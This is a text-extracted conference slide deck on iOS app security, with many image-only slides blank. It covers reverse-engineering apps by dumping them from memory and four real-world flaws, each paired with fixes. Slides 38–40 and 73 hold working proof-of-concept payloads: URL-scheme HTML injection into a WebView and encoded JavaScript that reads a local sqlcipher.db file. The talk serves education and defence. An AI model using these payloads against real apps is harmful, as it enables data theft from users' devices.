SLIDE 1
Common Vulnerabilities on iOS Apps
by ivan r QconSF
@ivRodriguezCA
@ivRodriguezCA
Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA - - PowerPoint PPT Presentation
Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA - - PowerPoint PPT Presentation
Common Vulnerabilities on iOS Apps by ivan r QconSF @ivRodriguezCA @ivRodriguezCA DISCLAIMER the views and opinions expressed on this talk are solely my own and do not reflect the views or opinions of my employer. @ivRodriguezCA
SLIDE 2
SLIDE 3
DISCLAIMER
the views and opinions expressed on this talk are solely my own and do not reflect the views or
- pinions of my employer.
@ivRodriguezCA
SLIDE 4
ivan_rodriguez.me
- security researcher and software engineer
- focused on iOS reverse engineering and mobile bug bounty programs
- i blog at ivrodriguez.com
- find me on twitter: @ivRodriguezCA
- find me on github: /ivRodriguezCA
@ivRodriguezCA
SLIDE 5
agenda
- reverse engineering an iOS app.
- tools and methods.
- common iOS vulnerabilities (all found on real world applications).
- how to fix and prevent these vulnerabilities.
- resources / conclusions.
- questions.
@ivRodriguezCA
SLIDE 6
reverse engineering an iOS app
- iOS apps are encrypted with an algorithm called FairPlay.
- we need a jailbroken device.
- we don’t “decrypt” the apps, we just dump them from memory.
- transfer them to a desktop where we do the reverse engineering.
@ivRodriguezCA
SLIDE 7
reverse engineering an iOS app
- how we dump the app from memory?
> dump memory <filename> <start_address> <end_address>
@ivRodriguezCA
SLIDE 8
reverse engineering an iOS app
- how we dump the app from memory?
> dump memory <filename> <start_address> <end_address>
- we can use tools to automate this.
@ivRodriguezCA
SLIDE 9
reverse engineering an iOS app
- some of the tools we can use:
- dumpdecrypted: https://github.com/stefanesser/dumpdecrypted
- bfinject: https://github.com/BishopFox/bfinject
- frida-ios-dump: https://github.com/AloneMonkey/frida-ios-dump
@ivRodriguezCA
SLIDE 10
reverse engineering an iOS app
@ivRodriguezCA
SLIDE 11
reverse engineering an iOS app
@ivRodriguezCA
SLIDE 12
reverse engineering an iOS app
@ivRodriguezCA
SLIDE 13
reverse engineering an iOS app
- dynamic and static analysis
@ivRodriguezCA
SLIDE 14
reverse engineering an iOS app
- dynamic and static analysis
@ivRodriguezCA
SLIDE 15
reverse engineering an iOS app
- dynamic and static analysis
@ivRodriguezCA
SLIDE 16
vulnerability # 1
- searching through embedded files within the app
@ivRodriguezCA
SLIDE 17
vulnerability # 1
@ivRodriguezCA
SLIDE 18
vulnerability # 1
private_key
@ivRodriguezCA
SLIDE 19
vulnerability # 1
private_key yes, PRIVATE key
@ivRodriguezCA
SLIDE 20
vulnerability # 1
cloud server
@ivRodriguezCA
SLIDE 21
vulnerability # 1
cloud server
@ivRodriguezCA
SLIDE 22
vulnerability # 1
cloud server
@ivRodriguezCA
SLIDE 23
vulnerability # 1
cloud server ssh
@ivRodriguezCA
SLIDE 24
vulnerability # 1
cloud server ssh
@ivRodriguezCA
SLIDE 25
how to fix vulnerability # 1
cloud server
- wn server
@ivRodriguezCA
SLIDE 26
how to fix vulnerability # 1
cloud server
- wn server
@ivRodriguezCA
SLIDE 27
how to fix vulnerability # 1
cloud server
- wn server
@ivRodriguezCA
SLIDE 28
how to fix vulnerability # 1
cloud server
- wn server
@ivRodriguezCA
SLIDE 29
how to fix vulnerability # 1
cloud server
- wn server
public api
@ivRodriguezCA
SLIDE 30
how to fix vulnerability # 1
cloud server
- wn server
ssh
@ivRodriguezCA
SLIDE 31
how to fix vulnerability # 1
cloud server
- wn server
ssh
@ivRodriguezCA
SLIDE 32
vulnerability # 2
@ivRodriguezCA
SLIDE 33
vulnerability # 2
@ivRodriguezCA
SLIDE 34
vulnerability # 2
@ivRodriguezCA
SLIDE 35
vulnerability # 2
@ivRodriguezCA
SLIDE 36
vulnerability # 2
@ivRodriguezCA
SLIDE 37
@ivRodriguezCA
SLIDE 38
vulnerability # 2
- coinza://news/<trusted-html>
@ivRodriguezCA
SLIDE 39
vulnerability # 2
- coinza://news/<trusted-html>
- <html><body><script>document.location = ‘https://en.wikipedia.org/
wiki/URL_redirection’;</script></body></html>
- @ivRodriguezCA
SLIDE 40
vulnerability # 2
- coinza://news/<trusted-html>
- <html><body><script>document.location = ‘https://en.wikipedia.org/
wiki/URL_redirection’;</script></body></html> coinza://news/ %3Chtml%3E%3Cbody%3E%3Cscript%3Edocument.location%20%3D%20% 27https%3A%2F%2Fen.wikipedia.org%2Fwiki%2FURL_redirection%27%3B% 3C%2Fscript%3E%3C%2Fbody%3E%3C%2Fhtml%3E
@ivRodriguezCA
SLIDE 41
how to fix vulnerability # 2
@ivRodriguezCA
SLIDE 42
how to fix vulnerability # 2
@ivRodriguezCA
SLIDE 43
how to fix vulnerability # 2
- URL Schemes + WebViews are dangerous and you should be careful
when you pair them.
- don’t load HTML code from user-controlled content.
- if you need to dynamically react to URL Schemes have a set of
whitelisted actions.
@ivRodriguezCA
SLIDE 44
@ivRodriguezCA
vulnerability # 3
SLIDE 45
@ivRodriguezCA
vulnerability # 3
SLIDE 46
vulnerability # 3
@ivRodriguezCA
SLIDE 47
vulnerability # 3
@ivRodriguezCA
SLIDE 48
vulnerability # 3
@ivRodriguezCA
SLIDE 49
vulnerability # 3
== ?
@ivRodriguezCA
SLIDE 50
vulnerability # 3
✅
@ivRodriguezCA
SLIDE 51
vulnerability # 3
🛒
@ivRodriguezCA
SLIDE 52
vulnerability # 3
🛒 🚬
@ivRodriguezCA
SLIDE 53
vulnerability # 3
🛒 ✅
@ivRodriguezCA
SLIDE 54
vulnerability # 3
🛒 website.com
@ivRodriguezCA
SLIDE 55
vulnerability # 3
🛒 username/password
@ivRodriguezCA
SLIDE 56
vulnerability # 3
🛒
@ivRodriguezCA
SLIDE 57
@ivRodriguezCA
SLIDE 58
vulnerability # 3
@ivRodriguezCA
SLIDE 59
vulnerability # 3
detected connection to a website
@ivRodriguezCA
SLIDE 60
vulnerability # 3
creates fake TLS certificate
@ivRodriguezCA
SLIDE 61
vulnerability # 3
sniffs client traffic
@ivRodriguezCA
SLIDE 62
how to fix vulnerability # 3
- vet and test your 3rd party frameworks, specially if they handle your
network requests.
- be careful when implementing your own certificate validation logic.
- if you want to implement HPKP you can use TrustKit:
- https://github.com/datatheorem/TrustKit
@ivRodriguezCA
SLIDE 63
how to fix vulnerability # 3
@ivRodriguezCA
source: https://cheatsheetseries.owasp.org/cheatsheets/Pinning_Cheat_Sheet.html
SLIDE 64
vulnerability # 4
@ivRodriguezCA
SLIDE 65
vulnerability # 4
@ivRodriguezCA
SLIDE 66
vulnerability # 4
@ivRodriguezCA
SLIDE 67
vulnerability # 4
@ivRodriguezCA
SLIDE 68
vulnerability # 4
@ivRodriguezCA
SLIDE 69
vulnerability # 4
- these methods are equivalent for local files
@ivRodriguezCA
SLIDE 70
vulnerability # 4
@ivRodriguezCA
SLIDE 71
vulnerability # 4
file: sqlcipher.db path: Documents/
@ivRodriguezCA
SLIDE 72
vulnerability # 4
send file to a remote location.
@ivRodriguezCA
SLIDE 73
vulnerability # 4
- coinza://news/
%3Chtml%3E%0A%20%20%20%3Cbody%3E%0A%20%20%20%20%20%20%3Cscript%3E%0A%20%20%20%20%20%20%20%20%20function%20loa dFile%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20var%20xmlhttp%20%3D%20new%20XMLHttpRequest%28%29%3B%0 A%20%20%20%20%20%20%20%20%20%20%20%20documentsPath%20%3D%20document.URL.split%28%27%2F%27%29.slice%280%2C%20-1%29.j
- in%28%27%2F%27%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20filePath%20%3D%20documentsPath%20%2B%20%27%2F%27%
20%2B%20%27sqlcipher.db%27%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onreadystatechange%20%3D%20function%28%2 9%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.readyState%20%3D%3D%204%29%20%7B%0A%20 %20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28xmlhttp.responseText.length%20%3E%200%29%20%7B%0A%20%2 0%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20alert%28%27Got%20file%20%5C%27sqlcipher.db%5C%27%2C%20size %3A%20%27%20%2B%20xmlhttp.responseText.length%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7 D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%3B%0A%2 0%20%20%20%20%20%20%20%20%20%20%20xmlhttp.onerror%20%3D%20function%28%29%20%7B%0A%20%20%20%20%20%20%20%20%20%2 0%20%20%20%20%20alert%28%27Error%21%20%27%20%2B%20filePath%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A %20%20%20%20%20%20%20%20%20%20%20%20xmlhttp.open%28%27GET%27%2C%20filePath%2C%20true%29%3B%0A%20%20%20%20%20%2 0%20%20%20%20%20%20xmlhttp.send%28%29%3B%0A%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20wind
- w.onload%20%3D%20loadFile%3B%0A%20%20%20%20%20%20%3C%2Fscript%3E%0A%20%20%20%20%20%20%3Cp%3E%0A%20%20%20%20%
20%20%20%20%20Hello%20World%0A%20%20%20%20%20%20%3C%2Fp%3E%0A%20%20%20%3C%2Fbody%3E%0A%3C%2Fhtml%3E @ivRodriguezCA
SLIDE 74
@ivRodriguezCA
SLIDE 75
how to fix vulnerability # 4
- do not use UIWebView anymore, use WKWebView instead.
- if you absolutely have to use UIWebView:
- do not use - (void)loadRequest:(NSURLRequest *)request for local files.
- Use - (void)loadHTMLString:(NSString *)string baseURL:(NSURL *)baseURL with an URL
- bject created with [URLWithString:@“about:blank”].
- @ivRodriguezCA
SLIDE 76
conclusions
- add security assessments to your release cycles.
- keep your 3rd party libraries up to date.
- be careful copy-pasting code from online sources.
- have a public bounty program or at least public channels for
responsible disclosures.
@ivRodriguezCA
SLIDE 77
resources
- OWASP - Mobile Application Security Verification Standard
https://github.com/OWASP/owasp-masvs
- OWASP - The Mobile Security Testing Guide
https://github.com/OWASP/owasp-mstg
- Resources Page of my course
https://github.com/ivRodriguezCA/RE-iOS-Apps/blob/master/ Resources.md
@ivRodriguezCA
SLIDE 78
resources
- for a more detailed guide visit:
https://github.com/ivRodriguezCA/RE-iOS-Apps
@ivRodriguezCA
SLIDE 79
@ivRodriguezCA
SLIDE 80
@ivRodriguezCA
SLIDE 81
questions?
@ivRodriguezCA
SLIDE 82
thank you!
@ivRodriguezCA